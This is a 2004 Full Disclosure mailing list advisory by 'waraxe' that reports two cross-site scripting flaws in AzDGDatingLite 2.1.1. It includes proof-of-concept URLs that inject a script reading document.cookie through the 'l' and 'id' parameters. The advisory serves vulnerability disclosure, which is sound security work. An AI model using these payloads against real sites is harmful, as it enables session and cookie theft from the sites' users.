Full Disclosure mailing list archives
[waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]
From: Janek Vind <come2waraxe () yahoo com>
Date: Thu, 8 Apr 2004 08:48:40 -0700 (PDT)
{================================================================================} { [waraxe-2004-SA#014] } {================================================================================} { } { [ Cross-Site Scripting aka XSS in AzDGDatingLite ] } { } {================================================================================} Author: Janek Vind "waraxe" Date: 07. April 2004 Location: Estonia, Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=14 Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AzDGDatingLite: Version 2.1.1 (probably older versions are affected too) Writed by: AzDG (support () azdg com) Homepage: http://www.azdg.com Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Cross-Site Scripting in language variable: http://localhost/azdlite/index.php?l=en"><script>alert(document.cookie);</script> 2. Cross-Site Scripting in view.php: http://localhost/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script> Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused! Special greets to Stefano from UT Bee Clan! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe () yahoo com Janek Vind "waraxe" Homepage: http://www.waraxe.us/ ---------------------------------- [ EOF ] ------------------------------------ __________________________________ Do you Yahoo!? Yahoo! Small Business $15K Web Design Giveaway http://promotions.yahoo.com/design_giveaway/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite] Janek Vind (Apr 08)